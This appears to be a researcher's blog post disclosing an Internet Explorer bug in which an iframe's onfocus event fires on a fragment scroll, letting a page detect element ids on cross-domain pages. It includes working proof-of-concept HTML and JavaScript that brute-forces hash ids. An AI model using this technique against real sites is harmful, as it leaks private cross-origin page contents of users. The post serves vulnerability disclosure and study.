Published 12 years 4 months ago • Last updated March 26, 2025 • ⏱️ 2 min read
This is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It's because IE fires the onfocus event of the iframe when the scroll occurs. This means using 1 network request we can discover if a site contains a particular id provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words and because we are using hash the future requests aren't sent to the server.
First we need a page with an id we can scroll to.
<p>test</p> <p>test</p> <p>test</p> <p>test</p> <p>test</p> <div id=1337>target</div>
When visiting this page it should jump to #1337 provided the window is small enough.
Next we create an iframe and attach an onfocus event:
<iframe src="http://hackvertor.co.uk/scroll/test.html" id="x" onfocus="alert('the iframe scrolled to: '+window.id);clearTimeout(timer)" name="x"></iframe>
Now we need to create the clicks to trigger the onfocus event and produce the scroll.
id=0; var anchor = document.createElement('a'); anchor.target="x"; document.body.appendChild(anchor); timer=setTimeout(function f(){ id++; document.getElementById('pos').innerText = id; anchor.href='http://hackvertor.co.uk/scroll/test.html#'+id; anchor.click(); if(id<10000) { timer=setTimeout(f,0); } },0)
The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 :)